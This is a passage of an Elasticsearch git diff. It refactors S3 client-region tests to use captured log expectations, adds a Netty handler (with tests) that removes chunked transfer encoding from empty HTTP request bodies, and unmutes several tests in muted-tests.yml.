org.elasticsearch.ElasticsearchException; import org.elasticsearch.cluster.metadata.ProjectId; import org.elasticsearch.cluster.metadata.RepositoryMetadata; import org.elasticsearch.cluster.project.TestProjectResolvers; @@ -33,7 +35,6 @@ import org.elasticsearch.test.junit.annotations.TestLogging; import org.elasticsearch.watcher.ResourceWatcherService; -import java.io.IOException; import java.net.URI; import java.util.concurrent.atomic.AtomicBoolean; @@ -42,7 +43,7 @@ public class S3ServiceTests extends ESTestCase { - public void testCachedClientsAreReleased() throws IOException { + public void testCachedClientsAreReleased() { final S3Service s3Service = new S3Service( mock(Environment.class), ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), @@ -107,30 +108,45 @@ public void testGetClientRegionFromSetting() { mock(ResourceWatcherService.class), () -> { assertTrue(regionRequested.compareAndSet(false, true)); - return randomFrom(randomFrom(Region.regions()), Region.of(randomIdentifier()), null); + if (randomBoolean()) { + throw new ElasticsearchException("simulated"); + } else { + return randomFrom(randomFrom(Region.regions()), Region.of(randomIdentifier())); + } } - ) + ); + var mockLog = MockLog.capture(S3Service.class, S3DefaultRegionHolder.class) ) { + mockLog.addExpectation( + new MockLog.UnseenEventExpectation( + "no default region warning", + 
S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "*" + ) + ); + s3Service.start(); assertTrue(regionRequested.get()); final var clientName = randomBoolean() ? "default" : randomIdentifier(); final var region = randomBoolean() ? randomFrom(Region.regions()) : Region.of(randomIdentifier()); - MockLog.assertThatLogger( - () -> assertSame( - region, - s3Service.getClientRegion( - S3ClientSettings.getClientSettings( - Settings.builder().put("s3.client." + clientName + ".region", region.id()).build(), - clientName - ) + + mockLog.addExpectation(new MockLog.UnseenEventExpectation("no warning", S3Service.class.getCanonicalName(), Level.WARN, "*")); + mockLog.addExpectation(new MockLog.UnseenEventExpectation("no debug", S3Service.class.getCanonicalName(), Level.DEBUG, "*")); + + assertSame( + region, + s3Service.getClientRegion( + S3ClientSettings.getClientSettings( + Settings.builder().put("s3.client." + clientName + ".region", region.id()).build(), + clientName ) - ), - S3Service.class, - new MockLog.UnseenEventExpectation("no warning", S3Service.class.getCanonicalName(), Level.WARN, "*"), - new MockLog.UnseenEventExpectation("no debug", S3Service.class.getCanonicalName(), Level.DEBUG, "*") + ) ); + + mockLog.assertAllExpectationsMatched(); } } @@ -145,10 +161,24 @@ public void testGetClientRegionFromEndpointSettingGuess() { mock(ResourceWatcherService.class), () -> { assertTrue(regionRequested.compareAndSet(false, true)); - return randomFrom(randomFrom(Region.regions()), Region.of(randomIdentifier()), null); + if (randomBoolean()) { + throw new ElasticsearchException("simulated"); + } else { + return randomFrom(randomFrom(Region.regions()), Region.of(randomIdentifier())); + } } - ) + ); + var mockLog = MockLog.capture(S3Service.class, S3DefaultRegionHolder.class) ) { + mockLog.addExpectation( + new MockLog.UnseenEventExpectation( + "no default region warning", + S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "*" + ) + ); + s3Service.start(); assertTrue(regionRequested.get()); @@ -163,18 +193,7 @@ public void testGetClientRegionFromEndpointSettingGuess() { ).url(); final var endpoint = randomFrom(endpointUrl.toString(), endpointUrl.getHost()); - MockLog.assertThatLogger( - () -> assertEquals( - endpoint, - guessedRegion, - s3Service.getClientRegion( - S3ClientSettings.getClientSettings( - Settings.builder().put("s3.client." + clientName + ".endpoint", endpoint).build(), - clientName - ) - ) - ), - S3Service.class, + mockLog.addExpectation( new MockLog.SeenEventExpectation( endpoint + " -> " + guessedRegion, S3Service.class.getCanonicalName(), @@ -188,6 +207,18 @@ public void testGetClientRegionFromEndpointSettingGuess() { ) ) ); + assertEquals( + endpoint, + guessedRegion, + s3Service.getClientRegion( + S3ClientSettings.getClientSettings( + Settings.builder().put("s3.client." + clientName + ".endpoint", endpoint).build(), + clientName + ) + ) + ); + + mockLog.assertAllExpectationsMatched(); } } @@ -205,16 +236,24 @@ public void testGetClientRegionFromDefault() { assertTrue(regionRequested.compareAndSet(false, true)); return defaultRegion; } - ) + ); + var mockLog = MockLog.capture(S3Service.class, S3DefaultRegionHolder.class) ) { + mockLog.addExpectation( + new MockLog.UnseenEventExpectation( + "no default region warning", + S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "*" + ) + ); + s3Service.start(); assertTrue(regionRequested.get()); final var clientName = randomBoolean() ? 
"default" : randomIdentifier(); - MockLog.assertThatLogger( - () -> assertSame(defaultRegion, s3Service.getClientRegion(S3ClientSettings.getClientSettings(Settings.EMPTY, clientName))), - S3Service.class, + mockLog.addExpectation( new MockLog.SeenEventExpectation( "warning", S3Service.class.getCanonicalName(), @@ -224,12 +263,17 @@ public void testGetClientRegionFromDefault() { + "] from SDK" ) ); + + assertSame(defaultRegion, s3Service.getClientRegion(S3ClientSettings.getClientSettings(Settings.EMPTY, clientName))); + + mockLog.assertAllExpectationsMatched(); } } @TestLogging(reason = "testing WARN log output", value = "org.elasticsearch.repositories.s3.S3Service:WARN") public void testGetClientRegionFallbackToUsEast1() { final var regionRequested = new AtomicBoolean(); + final var exceptionMessage = randomIdentifier(); try ( var s3Service = new S3Service( mock(Environment.class), @@ -238,23 +282,39 @@ public void testGetClientRegionFallbackToUsEast1() { mock(ResourceWatcherService.class), () -> { assertTrue(regionRequested.compareAndSet(false, true)); - return null; + throw new ElasticsearchException(exceptionMessage); } - ) + ); + var mockLog = MockLog.capture(S3Service.class, S3DefaultRegionHolder.class) ) { s3Service.start(); assertTrue(regionRequested.get()); final var clientName = randomBoolean() ? "default" : randomIdentifier(); - MockLog.assertThatLogger( - () -> assertNull(s3Service.getClientRegion(S3ClientSettings.getClientSettings(Settings.EMPTY, clientName))), - S3Service.class, - new MockLog.SeenEventExpectation("warning", S3Service.class.getCanonicalName(), Level.WARN, """ - found S3 client with no configured region and no configured endpoint, \ - falling back to [us-east-1] and enabling cross-region access; \ - to suppress this warning, configure the [s3.client.CLIENT_NAME.region] setting on this node""") + mockLog.addExpectation( + new MockLog.SeenEventExpectation( + "default provider chain failure", + S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "failed to obtain region from default provider chain" + ) { + @Override + public void match(LogEvent event) { + if (event.getThrown() instanceof ElasticsearchException e && exceptionMessage.equals(e.getMessage())) { + super.match(event); + } + } + } ); + mockLog.addExpectation(new MockLog.SeenEventExpectation("warning", S3Service.class.getCanonicalName(), Level.WARN, """ + found S3 client with no configured region and no configured endpoint, \ + falling back to [us-east-1] and enabling cross-region access; \ + to suppress this warning, configure the [s3.client.CLIENT_NAME.region] setting on this node""")); + + assertNull(s3Service.getClientRegion(S3ClientSettings.getClientSettings(Settings.EMPTY, clientName))); + + mockLog.assertAllExpectationsMatched(); } } @@ -302,15 +362,20 @@ public void testEndpointOverrideSchemeUsesHttpIfHttpProtocolSpecified() { } private URI getEndpointUri(Settings.Builder settings, String clientName) { - return new S3Service( - mock(Environment.class), - ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), - TestProjectResolvers.DEFAULT_PROJECT_ONLY, - mock(ResourceWatcherService.class), - () -> Region.of(randomIdentifier()) - ).buildClient(S3ClientSettings.getClientSettings(settings.build(), clientName), mock(SdkHttpClient.class)) - .serviceClientConfiguration() - .endpointOverride() - .get(); + try ( + var s3Service = new S3Service( + mock(Environment.class), + ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), + 
TestProjectResolvers.DEFAULT_PROJECT_ONLY, + mock(ResourceWatcherService.class), + () -> Region.of(randomIdentifier()) + ) + ) { + s3Service.start(); + return s3Service.buildClient(S3ClientSettings.getClientSettings(settings.build(), clientName), mock(SdkHttpClient.class)) + .serviceClientConfiguration() + .endpointOverride() + .get(); + } } } diff --git a/modules/streams/src/main/java/org/elasticsearch/rest/streams/logs/StreamsStatusAction.java b/modules/streams/src/main/java/org/elasticsearch/rest/streams/logs/StreamsStatusAction.java index 95a1783ac0452..4b60c088980e9 100644 --- a/modules/streams/src/main/java/org/elasticsearch/rest/streams/logs/StreamsStatusAction.java +++ b/modules/streams/src/main/java/org/elasticsearch/rest/streams/logs/StreamsStatusAction.java @@ -26,7 +26,7 @@ public class StreamsStatusAction { - public static ActionType<Response> INSTANCE = new ActionType<>("cluster:admin/streams/status"); + public static ActionType<Response> INSTANCE = new ActionType<>("cluster:monitor/streams/status"); public static class Request extends LocalClusterStateRequest { protected Request(TimeValue masterTimeout) { diff --git a/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/http/netty4/Netty4IncrementalRequestHandlingIT.java b/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/http/netty4/Netty4IncrementalRequestHandlingIT.java index 1f783a0c30d4c..1a8f33f57a5db 100644 --- a/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/http/netty4/Netty4IncrementalRequestHandlingIT.java +++ b/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/http/netty4/Netty4IncrementalRequestHandlingIT.java @@ -85,6 +85,7 @@ import org.elasticsearch.transport.netty4.Netty4Utils; import org.elasticsearch.xcontent.json.JsonXContent; +import java.io.InputStream; import java.nio.channels.ClosedChannelException; import java.nio.charset.StandardCharsets; import java.util.Collection; @@ -392,6 +393,23 @@ public void testOversizedChunkedEncoding() throws Exception { } } + public void testEmptyChunkedEncoding() throws Exception { + try (var clientContext = newClientContext()) { + var opaqueId = clientContext.newOpaqueId(); + final var emptyStream = new HttpChunkedInput(new ChunkedStream(InputStream.nullInputStream())); + final var request = httpRequest(opaqueId, 0); + HttpUtil.setTransferEncodingChunked(request, true); + clientContext.channel().pipeline().addLast(new ChunkedWriteHandler()); + clientContext.channel().writeAndFlush(request); + clientContext.channel().writeAndFlush(emptyStream); + + var handler = clientContext.awaitRestChannelAccepted(opaqueId); + var restRequest = handler.restRequest; + assertFalse(restRequest.hasContent()); + assertNull(restRequest.header("Transfer-Encoding")); + } + } + // ensures that we don't leak buffers in stream on 400-bad-request // some bad requests are dispatched from rest-controller before reaching rest handler // test relies on netty's buffer leak detection @@ -733,6 +751,7 @@ Channel channel() { static class ServerRequestHandler implements BaseRestHandler.RequestBodyChunkConsumer { final SubscribableListener<Void> channelAccepted = new SubscribableListener<>(); final String opaqueId; + final RestRequest restRequest; private final AtomicReference<SubscribableListener<Void>> nextChunkListenerRef = new AtomicReference<>(); final Netty4HttpRequestBodyStream stream; RestChannel channel; @@ -740,8 +759,9 @@ static class ServerRequestHandler implements BaseRestHandler.RequestBodyChunkCon final CountDownLatch closedLatch = new CountDownLatch(1);
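        // The constructor change below threads the server-side RestRequest into this test
        // handler, so testEmptyChunkedEncoding (above) can assert that an empty chunked body
        // reaches the REST layer with no content and with the Transfer-Encoding header removed.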
volatile boolean shouldThrowInsideHandleChunk = false; - ServerRequestHandler(String opaqueId, Netty4HttpRequestBodyStream stream) { + ServerRequestHandler(String opaqueId, RestRequest restRequest, Netty4HttpRequestBodyStream stream) { this.opaqueId = opaqueId; + this.restRequest = restRequest; this.stream = stream; } @@ -934,7 +954,7 @@ public List<Route> routes() { protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient client) { var stream = (Netty4HttpRequestBodyStream) request.contentStream(); var opaqueId = request.getHeaders().get(Task.X_OPAQUE_ID_HTTP_HEADER).get(0); - var handler = new ServerRequestHandler(opaqueId, stream); + var handler = new ServerRequestHandler(opaqueId, request, stream); handlersByOpaqueId.getHandlerFor(opaqueId).onResponse(handler); return handler; } diff --git a/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/transport/netty4/ESLoggingHandlerIT.java b/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/transport/netty4/ESLoggingHandlerIT.java index 9d054839849de..2888e40154da5 100644 --- a/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/transport/netty4/ESLoggingHandlerIT.java +++ b/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/transport/netty4/ESLoggingHandlerIT.java @@ -10,11 +10,13 @@ package org.elasticsearch.transport.netty4; import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.core.LogEvent; import org.elasticsearch.ESNetty4IntegTestCase; import org.elasticsearch.core.TimeValue; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.junit.annotations.TestLogging; +import org.elasticsearch.transport.NodeDisconnectedException; import org.elasticsearch.transport.TcpTransport; import org.elasticsearch.transport.TransportLogger; @@ -117,7 +119,15 @@ public void testExceptionalDisconnectLogging() throws Exception { TcpTransport.class.getCanonicalName(), Level.DEBUG, ".*closed transport connection \[[1-9][0-9]*\] to .* with age \[[0-9]+ms\], exception:.*" - ) + ) { + @Override + public void match(LogEvent event) { + if (event.getThrown() instanceof NodeDisconnectedException nodeDisconnectedException + && nodeDisconnectedException.getMessage().contains("closed exceptionally: Netty4TcpChannel{")) { + super.match(event); + } + } + } ); final String nodeName = internalCluster().startNode(); diff --git a/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandler.java b/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandler.java new file mode 100644 index 0000000000000..045767cf41c63 --- /dev/null +++ b/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandler.java @@ -0,0 +1,50 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1".
+ */ + +package org.elasticsearch.http.netty4; + +import io.netty.channel.ChannelHandlerContext; +import io.netty.channel.ChannelInboundHandlerAdapter; +import io.netty.handler.codec.http.HttpContent; +import io.netty.handler.codec.http.HttpRequest; +import io.netty.handler.codec.http.HttpUtil; +import io.netty.handler.codec.http.LastHttpContent; + +public class Netty4EmptyChunkHandler extends ChannelInboundHandlerAdapter { + + private HttpRequest currentRequest; + + @Override + public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception { + switch (msg) { + case HttpRequest request -> { + if (request.decoderResult().isSuccess() && HttpUtil.isTransferEncodingChunked(request)) { + currentRequest = request; + ctx.read(); + } else { + currentRequest = null; + ctx.fireChannelRead(request); + } + } + case HttpContent content -> { + if (currentRequest != null) { + if (content instanceof LastHttpContent && content.content().readableBytes() == 0) { + HttpUtil.setTransferEncodingChunked(currentRequest, false); + } + ctx.fireChannelRead(currentRequest); + ctx.fireChannelRead(content); + currentRequest = null; + } else { + ctx.fireChannelRead(content); + } + } + default -> ctx.fireChannelRead(msg); + } + } +} diff --git a/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4HttpServerTransport.java b/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4HttpServerTransport.java index 9dc8555bad552..7f25d88bfda4c 100644 --- a/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4HttpServerTransport.java +++ b/modules/transport-netty4/src/main/java/org/elasticsearch/http/netty4/Netty4HttpServerTransport.java @@ -414,6 +414,7 @@ protected Result beginEncode(HttpResponse httpResponse, String acceptEncoding) t if (ResourceLeakDetector.isEnabled()) { ch.pipeline().addLast(new Netty4LeakDetectionHandler()); } + ch.pipeline().addLast(new Netty4EmptyChunkHandler()); // See https://github.com/netty/netty/issues/15053: the combination of FlowControlHandler and HttpContentDecompressor above // can emit multiple chunks per read, but HttpBody.Stream requires chunks to arrive one-at-a-time so until that issue is // resolved we must add another flow controller here: diff --git a/modules/transport-netty4/src/test/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandlerTests.java b/modules/transport-netty4/src/test/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandlerTests.java new file mode 100644 index 0000000000000..f6691ae204a2e --- /dev/null +++ b/modules/transport-netty4/src/test/java/org/elasticsearch/http/netty4/Netty4EmptyChunkHandlerTests.java @@ -0,0 +1,96 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.http.netty4; + +import io.netty.buffer.Unpooled; +import io.netty.channel.embedded.EmbeddedChannel; +import io.netty.handler.codec.DecoderResult; +import io.netty.handler.codec.http.DefaultHttpRequest; +import io.netty.handler.codec.http.DefaultLastHttpContent; +import io.netty.handler.codec.http.HttpMessage; +import io.netty.handler.codec.http.HttpMethod; +import io.netty.handler.codec.http.HttpRequest; +import io.netty.handler.codec.http.HttpUtil; +import io.netty.handler.codec.http.HttpVersion; + +import org.elasticsearch.test.ESTestCase; + +public class Netty4EmptyChunkHandlerTests extends ESTestCase { + + private EmbeddedChannel channel; + + @Override + public void setUp() throws Exception { + super.setUp(); + channel = new EmbeddedChannel(new Netty4EmptyChunkHandler()); + channel.config().setAutoRead(false); + } + + public void testNonChunkedPassthrough() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + var content = new DefaultLastHttpContent(Unpooled.EMPTY_BUFFER); + channel.writeInbound(req, content); + assertEquals(req, channel.readInbound()); + assertEquals(content, channel.readInbound()); + } + + public void testDecodingFailurePassthrough() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + HttpUtil.setTransferEncodingChunked(req, true); + req.setDecoderResult(DecoderResult.failure(new Exception())); + channel.writeInbound(req); + var recvReq = (HttpRequest) channel.readInbound(); + assertTrue(recvReq.decoderResult().isFailure()); + assertTrue(HttpUtil.isTransferEncodingChunked(recvReq)); + } + + public void testHoldChunkedRequest() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + HttpUtil.setTransferEncodingChunked(req, true); + var readSniffer = new ReadSniffer(); + channel.pipeline().addFirst(readSniffer); + channel.writeInbound(req); + assertNull("should hold on HTTP request until first chunk arrives", channel.readInbound()); + assertEquals("must read first chunk when holding request", 1, readSniffer.readCount); + } + + public void testRemoveEncodingFromEmpty() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + HttpUtil.setTransferEncodingChunked(req, true); + var content = new DefaultLastHttpContent(Unpooled.EMPTY_BUFFER); + channel.writeInbound(req, content); + var recvReq = channel.readInbound(); + assertEquals(req, recvReq); + assertEquals(content, channel.readInbound()); + assertFalse("should remove Transfer-Encoding from empty content", HttpUtil.isTransferEncodingChunked((HttpMessage) recvReq)); + } + + public void testKeepEncodingForNonEmpty() { + var req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.POST, ""); + HttpUtil.setTransferEncodingChunked(req, true); + var content = new DefaultLastHttpContent(Unpooled.wrappedBuffer(randomByteArrayOfLength(between(1, 1024)))); + channel.writeInbound(req, content); + var recvReq = channel.readInbound(); + assertEquals(req, recvReq); + assertEquals(content, channel.readInbound()); + assertTrue("should keep Transfer-Encoding for non-empty content", HttpUtil.isTransferEncodingChunked((HttpMessage) recvReq)); + } + + public void testRandomizedChannelReuse() { + for (int i = 0; i < 1000; i++) { + switch (between(0, 3)) { + case 0 -> testNonChunkedPassthrough(); + case 1 -> testKeepEncodingForNonEmpty(); + case 2 -> testDecodingFailurePassthrough(); + default -> testRemoveEncodingFromEmpty(); + } + } + } +} diff --git 
a/modules/transport-netty4/src/test/java/org/elasticsearch/transport/netty4/SimpleNetty4TransportTests.java b/modules/transport-netty4/src/test/java/org/elasticsearch/transport/netty4/SimpleNetty4TransportTests.java index 5876945cf93b6..5a0012bfaef4b 100644 --- a/modules/transport-netty4/src/test/java/org/elasticsearch/transport/netty4/SimpleNetty4TransportTests.java +++ b/modules/transport-netty4/src/test/java/org/elasticsearch/transport/netty4/SimpleNetty4TransportTests.java @@ -11,7 +11,6 @@ import org.apache.lucene.util.Constants; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.cluster.node.DiscoveryNodeUtils; @@ -80,7 +79,7 @@ public void executeHandshake( super.executeHandshake(node, channel, profile, listener); } else { assert version.equals(TransportVersion.current()); - listener.onResponse(TransportVersions.MINIMUM_COMPATIBLE); + listener.onResponse(TransportVersion.minimumCompatible()); } } }; diff --git a/muted-tests.yml b/muted-tests.yml index 54ae87714d58e..2bbad28b75f80 100644 --- a/muted-tests.yml +++ b/muted-tests.yml @@ -64,8 +64,6 @@ tests: - class: org.elasticsearch.xpack.shutdown.NodeShutdownIT method: testAllocationPreventedForRemoval issue: https://github.com/elastic/elasticsearch/issues/116363 -- class: org.elasticsearch.xpack.security.authc.ldap.ActiveDirectoryGroupsResolverTests - issue: https://github.com/elastic/elasticsearch/issues/116182 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=snapshot/20_operator_privileges_disabled/Operator only settings can be set and restored by non-operator user when operator privileges is disabled} issue: https://github.com/elastic/elasticsearch/issues/116775 @@ -114,8 +112,6 @@ tests: - class: org.elasticsearch.xpack.ml.integration.ForecastIT method: testOverflowToDisk issue: https://github.com/elastic/elasticsearch/issues/117740 -- class: org.elasticsearch.xpack.security.authc.ldap.MultiGroupMappingIT - issue: https://github.com/elastic/elasticsearch/issues/119599 - class: org.elasticsearch.multi_cluster.MultiClusterYamlTestSuiteIT issue: https://github.com/elastic/elasticsearch/issues/119983 - class: org.elasticsearch.xpack.test.rest.XPackRestIT @@ -138,56 +134,27 @@ tests: - class: org.elasticsearch.xpack.inference.DefaultEndPointsIT method: testMultipleInferencesTriggeringDownloadAndDeploy issue: https://github.com/elastic/elasticsearch/issues/120668 -- class: org.elasticsearch.xpack.security.authc.ldap.ADLdapUserSearchSessionFactoryTests - issue: https://github.com/elastic/elasticsearch/issues/119882 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=ml/3rd_party_deployment/Test start deployment fails while model download in progress} issue: https://github.com/elastic/elasticsearch/issues/120810 - class: org.elasticsearch.xpack.security.authc.service.ServiceAccountIT method: testAuthenticateShouldNotFallThroughInCaseOfFailure issue: https://github.com/elastic/elasticsearch/issues/120902 -- class: org.elasticsearch.packaging.test.DockerTests - method: test050BasicApiTests - issue: https://github.com/elastic/elasticsearch/issues/120911 -- class: org.elasticsearch.packaging.test.DockerTests - method: test140CgroupOsStatsAreAvailable - issue: https://github.com/elastic/elasticsearch/issues/120914 -- class: org.elasticsearch.packaging.test.DockerTests - method: test070BindMountCustomPathConfAndJvmOptions - issue: 
https://github.com/elastic/elasticsearch/issues/120910 -- class: org.elasticsearch.packaging.test.DockerTests - method: test071BindMountCustomPathWithDifferentUID - issue: https://github.com/elastic/elasticsearch/issues/120918 -- class: org.elasticsearch.packaging.test.DockerTests - method: test171AdditionalCliOptionsAreForwarded - issue: https://github.com/elastic/elasticsearch/issues/120925 - class: org.elasticsearch.backwards.MixedClusterClientYamlTestSuiteIT method: test {p0=nodes.stats/11_indices_metrics/indices mappings exact count test for indices level} issue: https://github.com/elastic/elasticsearch/issues/120950 -- class: org.elasticsearch.xpack.ml.integration.PyTorchModelIT - issue: https://github.com/elastic/elasticsearch/issues/121165 -- class: org.elasticsearch.xpack.security.authc.ldap.ActiveDirectorySessionFactoryTests - issue: https://github.com/elastic/elasticsearch/issues/121285 -- class: org.elasticsearch.test.rest.yaml.CcsCommonYamlTestSuiteIT - issue: https://github.com/elastic/elasticsearch/issues/121407 - class: org.elasticsearch.analysis.common.CommonAnalysisClientYamlTestSuiteIT method: test {yaml=analysis-common/40_token_filters/stemmer_override file access} issue: https://github.com/elastic/elasticsearch/issues/121625 - class: org.elasticsearch.test.rest.ClientYamlTestSuiteIT method: test {yaml=snapshot.delete/10_basic/Delete a snapshot asynchronously} issue: https://github.com/elastic/elasticsearch/issues/122102 -- class: org.elasticsearch.smoketest.SmokeTestMonitoringWithSecurityIT - method: testHTTPExporterWithSSL - issue: https://github.com/elastic/elasticsearch/issues/122220 - class: org.elasticsearch.blocks.SimpleBlocksIT method: testConcurrentAddBlock issue: https://github.com/elastic/elasticsearch/issues/122324 - class: org.elasticsearch.xpack.ilm.TimeSeriesLifecycleActionsIT method: testHistoryIsWrittenWithFailure issue: https://github.com/elastic/elasticsearch/issues/123203 -- class: org.elasticsearch.packaging.test.DockerTests - method: test151MachineDependentHeapWithSizeOverride - issue: https://github.com/elastic/elasticsearch/issues/123437 - class: org.elasticsearch.action.admin.cluster.node.tasks.CancellableTasksIT method: testChildrenTasksCancelledOnTimeout issue: https://github.com/elastic/elasticsearch/issues/123568 @@ -227,18 +194,9 @@ tests: - class: org.elasticsearch.packaging.test.BootstrapCheckTests method: test20RunWithBootstrapChecks issue: https://github.com/elastic/elasticsearch/issues/124940 -- class: org.elasticsearch.xpack.esql.action.CrossClusterAsyncQueryStopIT - method: testStopQueryLocal - issue: https://github.com/elastic/elasticsearch/issues/121672 - class: org.elasticsearch.packaging.test.BootstrapCheckTests method: test10Install issue: https://github.com/elastic/elasticsearch/issues/124957 -- class: org.elasticsearch.packaging.test.DockerTests - method: test011SecurityEnabledStatus - issue: https://github.com/elastic/elasticsearch/issues/124990 -- class: org.elasticsearch.packaging.test.DockerTests - method: test012SecurityCanBeDisabled - issue: https://github.com/elastic/elasticsearch/issues/116636 - class: org.elasticsearch.index.shard.StoreRecoveryTests method: testAddIndices issue: https://github.com/elastic/elasticsearch/issues/124104 @@ -251,9 +209,6 @@ tests: - class: org.elasticsearch.smoketest.MlWithSecurityIT method: test {yaml=ml/data_frame_analytics_cat_apis/Test cat data frame analytics single job with header} issue: https://github.com/elastic/elasticsearch/issues/125642 -- class: 
org.elasticsearch.packaging.test.DockerTests - method: test010Install - issue: https://github.com/elastic/elasticsearch/issues/125680 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_start_stop/Test schedule_now on an already started transform} issue: https://github.com/elastic/elasticsearch/issues/120720 @@ -269,24 +224,12 @@ tests: - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_stats/Test get transform stats with timeout} issue: https://github.com/elastic/elasticsearch/issues/125975 -- class: org.elasticsearch.packaging.test.DockerTests - method: test021InstallPlugin - issue: https://github.com/elastic/elasticsearch/issues/116147 - class: org.elasticsearch.action.RejectionActionIT method: testSimulatedSearchRejectionLoad issue: https://github.com/elastic/elasticsearch/issues/125901 -- class: org.elasticsearch.search.CCSDuelIT - method: testTerminateAfter - issue: https://github.com/elastic/elasticsearch/issues/126085 - class: org.elasticsearch.search.basic.SearchWithRandomDisconnectsIT method: testSearchWithRandomDisconnects issue: https://github.com/elastic/elasticsearch/issues/122707 -- class: org.elasticsearch.index.engine.ThreadPoolMergeSchedulerTests - method: testSchedulerCloseWaitsForRunningMerge - issue: https://github.com/elastic/elasticsearch/issues/125236 -- class: org.elasticsearch.packaging.test.DockerTests - method: test020PluginsListWithNoPlugins - issue: https://github.com/elastic/elasticsearch/issues/126232 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_reset/Test force reseting a running transform} issue: https://github.com/elastic/elasticsearch/issues/126240 @@ -296,18 +239,9 @@ tests: - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=ml/start_data_frame_analytics/Test start classification analysis when the dependent variable cardinality is too low} issue: https://github.com/elastic/elasticsearch/issues/126299 -- class: org.elasticsearch.packaging.test.DockerTests - method: test023InstallPluginUsingConfigFile - issue: https://github.com/elastic/elasticsearch/issues/126145 -- class: org.elasticsearch.search.SearchWithRejectionsIT - method: testOpenContextsAfterRejections - issue: https://github.com/elastic/elasticsearch/issues/126340 - class: org.elasticsearch.smoketest.MlWithSecurityIT method: test {yaml=ml/start_data_frame_analytics/Test start classification analysis when the dependent variable cardinality is too low} issue: https://github.com/elastic/elasticsearch/issues/123200 -- class: org.elasticsearch.packaging.test.DockerTests - method: test022InstallPluginsFromLocalArchive - issue: https://github.com/elastic/elasticsearch/issues/116866 - class: org.elasticsearch.smoketest.MlWithSecurityIT method: test {yaml=ml/trained_model_cat_apis/Test cat trained models} issue: https://github.com/elastic/elasticsearch/issues/125750 @@ -335,12 +269,6 @@ tests: - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_start_stop/Test start/stop/start continuous transform} issue: https://github.com/elastic/elasticsearch/issues/126755 -- class: org.elasticsearch.search.SearchServiceSingleNodeTests - method: testBeforeShardLockDuringShardCreate - issue: https://github.com/elastic/elasticsearch/issues/126812 -- class: org.elasticsearch.search.SearchServiceSingleNodeTests - method: testLookUpSearchContext - issue: https://github.com/elastic/elasticsearch/issues/126813 - class: 
